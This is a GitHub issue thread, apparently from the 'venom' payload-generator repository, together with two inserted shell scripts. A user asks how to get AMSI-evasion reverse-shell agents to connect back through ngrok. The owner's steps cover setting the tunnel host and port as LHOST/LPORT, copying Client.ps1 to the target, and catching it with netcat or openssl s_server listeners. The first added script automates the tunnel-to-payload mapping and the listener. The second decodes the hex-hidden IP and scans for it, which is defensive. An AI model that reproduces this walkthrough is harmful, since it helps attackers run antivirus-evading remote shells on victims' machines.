problem in getting a connection on public network / WAN #76

Open
ricko2991 opened this issue Sep 28, 2020 · 7 comments

Comments

@ricko2991 (Author)

Hi, I want to get a connection from a different network by sending a payload containing my IP address, delivered through an HTTP port-forwarding service, namely LocalXpose, but I don't seem to get a return connection from the target.

[Screenshots 1-3: Localhost; port forwarding service; Listener]

I tried the method above and it might not work, so I have to use TCP. So the payload uses the LocalXpose port and I, as the listener, use my local port. Okay, this is my problem: when I use the TCP port provided by LocalXpose, it will also be used as the listener. So how can I switch that listener back to my localhost? The listener should use my local port, but I can't change it.

@r00t-3xp10it (Owner)

@ricko2991 (Author) commented Sep 29, 2020

Hi, @r00t-3xp10it, I have no problem with payload categories 1-7 when port forwarding.
But I have a problem with the AMSI evasion payloads; I can't do port forwarding with them.

@ricko2991 (Author) commented Sep 29, 2020

Have you tried it and succeeded? Somehow I failed...
Can you show the host and the port you are using on the payload, and also the listeners you used?

Hi, I tried this:
2.tcp.ngrok.io:14598 --> localhost:1111

Payload options (ngrok)
LPORT : 14598
LHOST : 13.59.15.185 or LHOST : 2.tcp.ngrok.io

Listeners
1. nc -lvp 0.0.0.0 14598 ==> invalid local port 0.0.0.0
2. nc -nlvp 1111 ==> not connected / nc -lvp 1111 ==> not connected
3. nc -nlvp 14598 ==> not connected
4. nc -s 127.0.0.1 -nlvp 14598 ==> not connected
5. nc -s 127.0.0.1 -nlvp 1111 ==> not connected

@r00t-3xp10it (Owner) commented Oct 12, 2020

OK, let's try this step by step ...
Check this video for reference: https://www.youtube.com/watch?v=8YswLITdE7g

1. ./ngrok tcp 14598
2. choose venom - amsi evasion agent nº 2
3. LHOST == 2.tcp.ngrok.io (ngrok)
4. LPORT == 14598 (ngrok)
5. go to /var/www/html and copy the agent (Client.ps1) to the target machine (manually)
6. start the venom listener (OpenSSL)
7. on the target machine, execute Client.ps1

Final notes:

AMSI evasion agents require the Apache2 webserver to deliver files to the target host ...
so venom users need to port forward the Client.ps1 connection AND the Apache2 webserver ..
"But in this exercise we are NOT going to port forward Apache2, just to test if the client connects back to the listener"..
OpenSSL agents require openssl s_server -quiet -key key.pem -cert cert.pem -port 14598 <- an OpenSSL listener, not Netcat
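Added example (not venom's own code and not from this thread): a small POSIX shell helper that turns the ngrok "Forwarding" line into the payload options and the listener command the steps above describe. The point it makes explicit is the one the thread tripped over: the payload's LHOST/LPORT are the public side of the tunnel (what the target can reach), while the listener binds the local port that was handed to `ngrok tcp`, and for the OpenSSL agents that listener is `openssl s_server`, not netcat. It assumes ngrok's `tcp://<host>:<port> -> localhost:<port>` line format and a self-signed key.pem/cert.pem; `make_cert` and `check_tls` need the openssl CLI and are not part of the offline self-check.

```shell
#!/bin/sh
# Added example, not venom's code. Maps an ngrok TCP tunnel to the venom
# payload options and the matching local listener.
# Assumed input format (what `ngrok tcp <local-port>` prints as Forwarding):
#   tcp://<public-host>:<public-port> -> localhost:<local-port>

# tunnel_parts LINE -> "LHOST=<host> LPORT=<public-port> LISTEN_PORT=<local-port>"
# The payload gets the PUBLIC side (that is what the target can reach);
# the listener binds the LOCAL side (that is where ngrok delivers the stream).
tunnel_parts() {
  set -- $1                     # $1=tcp://host:port  $2=->  $3=localhost:port
  pub="${1#tcp://}"
  lhost="${pub%:*}"
  lport="${pub##*:}"
  listen_port="${3##*:}"
  printf 'LHOST=%s LPORT=%s LISTEN_PORT=%s\n' "$lhost" "$lport" "$listen_port"
}

# listener_cmd LISTEN_PORT [KEY] [CERT]
# The OpenSSL agents expect a TLS server on the other end: netcat accepts the
# raw TCP connection but cannot complete the agent's TLS handshake, so the
# listener is openssl s_server on the tunnel's local port.
listener_cmd() {
  printf 'openssl s_server -quiet -key %s -cert %s -port %s\n' \
    "${2:-key.pem}" "${3:-cert.pem}" "$1"
}

# make_cert [KEY] [CERT]: throwaway self-signed key/cert for s_server
# (requires the openssl CLI).
make_cert() {
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=localhost" \
    -keyout "${1:-key.pem}" -out "${2:-cert.pem}" 2>/dev/null
}

# check_tls HOST PORT: do a TLS handshake through the tunnel from the
# attacker side before delivering the agent. Exit status 0 means s_server
# answered via ngrok, so the client will reach a TLS listener too.
check_tls() {
  openssl s_client -connect "$1:$2" </dev/null >/dev/null 2>&1
}

# Usage: sh tunnel-check.sh 'tcp://2.tcp.ngrok.io:14598 -> localhost:1111'
if [ $# -gt 0 ]; then
  parts=$(tunnel_parts "$1")
  eval "$parts"
  echo "payload : LHOST=$LHOST LPORT=$LPORT"
  echo "listener: $(listener_cmd "$LISTEN_PORT")"
fi
```

With the mapping the thread used (2.tcp.ngrok.io:14598 -> localhost:1111) the helper prints LHOST=2.tcp.ngrok.io, LPORT=14598 for the payload and an s_server listener on port 1111; with the owner's `./ngrok tcp 14598` the local side is 14598 and the public port is whatever ngrok prints, which is the value to put in LPORT.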

@ricko2991 (Author)

Thank you, now it's working.
Also, for example, I am using agent no. 3 on AMSI and it is covered by "hex obfuscation"; how do I decode a script covered by hex?

@r00t-3xp10it (Owner) commented Oct 13, 2020

The only thing encoded (hex) in agent nº 3 is the IP address ...
This is one attempt to hide the IP address 'string' from AMSI string detection inside Client.ps1 ...

[Screenshots: hex; how to decode hex]
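Added example (not venom's code, not from this thread): POSIX shell functions that encode and decode the hex form of an LHOST string the way a reader would, plus the check a defender wants, a scan that pulls hex runs out of a script and reports the ones that decode to an IPv4 address. The sample script text inside `sample_agent` is constructed for this example; the real Client.ps1 layout is not shown on this page, only the fact that the IP address is hex-encoded.

```shell
#!/bin/sh
# Added example, not venom's code. Hex-encoding the IP only hides the dotted
# string from a naive pattern match; the encoding is trivially reversible.

# hex_encode STRING -> lowercase hex of its bytes
hex_encode() { printf '%s' "$1" | od -An -tx1 | tr -d ' \n'; }

# hex_decode HEX -> the bytes; fails on non-hex or odd-length input
hex_decode() {
  case "$1" in ""|*[!0-9a-fA-F]*) return 1;; esac
  [ $(( ${#1} % 2 )) -eq 0 ] || return 1
  h="$1"
  while [ -n "$h" ]; do
    pair="${h%"${h#??}"}"                        # first two hex digits
    printf "\\$(printf '%03o' "0x$pair")"        # emit as an octal escape
    h="${h#??}"
  done
}

# is_ipv4 STRING -> 0 if it is a dotted quad with octets 0-255
is_ipv4() {
  addr="$1"
  case "$addr" in ""|*[!0-9.]*|.*|*.|*..*) return 1;; esac
  old_ifs=$IFS; IFS=.; set -- $addr; IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    [ "$o" -le 255 ] || return 1
  done
}

# find_hex_ips [FILE]: hex runs of 14-30 digits (the length range of an
# encoded dotted quad) that decode to an IPv4 address. Reads stdin if no file.
find_hex_ips() {
  grep -oE '[0-9a-fA-F]{14,30}' "${1:--}" | while read -r run; do
    s=$(hex_decode "$run") || continue
    is_ipv4 "$s" || continue
    printf '%s -> %s\n' "$run" "$s"
  done
}

# Constructed sample (not the real Client.ps1): one hex-encoded address and
# one hex run that is not an address.
sample_agent() {
  cat <<'EOF'
# constructed sample script
$enc = "3139322e3136382e312e3130"
$port = 14598
$note = "deadbeefdeadbeefdeadbeef"
EOF
}

# Usage: sh hexip.sh Client.ps1   (scan a real file)
#        sh hexip.sh              (scan the constructed sample)
if [ $# -gt 0 ]; then
  find_hex_ips "$1"
elif [ -z "$HEXIP_NO_DEMO" ]; then
  sample_agent | find_hex_ips
fi
```

`hex_decode` writes each byte with a printf octal escape so it needs no xxd; `find_hex_ips` is the same idea a detection rule would use, decode candidate hex runs and keep the ones that parse as an address, which is why this obfuscation buys very little against anyone who looks at the script.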

@ricko2991 (Author)

Thank you 👍

r00t-3xp10it reopened this Oct 14, 2020
Repository owner deleted a comment from ricko2991 Jan 10, 2021